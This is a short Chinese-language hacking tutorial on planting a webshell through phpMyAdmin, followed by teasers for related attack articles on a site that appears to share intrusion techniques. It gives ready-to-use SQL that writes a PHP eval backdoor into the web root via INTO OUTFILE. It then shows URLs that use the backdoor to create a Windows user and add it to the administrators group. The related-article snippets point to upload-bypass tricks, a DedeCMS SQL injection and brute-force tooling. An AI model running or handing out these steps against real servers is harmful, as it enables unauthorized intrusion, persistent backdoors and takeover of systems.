利用phpMyAdmin拿webshell
首先用暴路径漏洞找到绝对路径,然后替换下面的路径
随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell)
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php @eval($_POST[cmd])?>’);
select cmd from a into outfile ‘D:\www\dmtz\bbs\upload\phpmyadmin\eval.php‘;
Drop TABLE IF EXISTS a;
这是我们的后门
http://chncto.com/phpmyadmin/eval.php
加个系统帐号
http://chncto.com/phpmyadmin/eval.php?cmd=net user test test /add
将test设置成系统管理员
http://chncto.com/phpmyadmin/eval.php?cmd=net localgroup administrators test /add
相关文章
动易CMS拿shell 图文教程
原创作者:泪舞 Qq:8109217 ( 转载请写上作者名 ) 动易CMS、我相信大家都不陌生吧?互联网很多企业站点都是用的动易...
专用工具完全免费使用方法
什么叫Tor? 被普遍接纳为互联网技术的“好”和“坏”应用的服务项目,客观事实是Tor是一个杰出的服务项目,假如你乃至对网络信息安全室内空间很感兴趣,那麼这是一个专用工具,你务必越来越十分了解。To...
总结一些上传漏洞利用方法
1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.a...
无需软件,笔记本自带wifi功能,几条命令轻松搞定
1.win键+R 呼出cmd 2.输入netsh wlan set hostednetwork mode=allow回车 3.输入netsh wlan set host...
Medusa是不是适用全部电脑操作系统?
什么叫Medusa? Medusa为一个规模性平行面,模块化设计,迅速和登陆的野蛮人。目地是适用很多容许远程控制认证的服务项目。该专用工具的关键作用包含根据进程的并行处理检测 - 能够 对好几个服务...
DedeCMS会员中心短消息SQL注射0day漏洞
需要:magic_quotes_gpc = Off DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码: http://www.chncto.com/de/membe...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!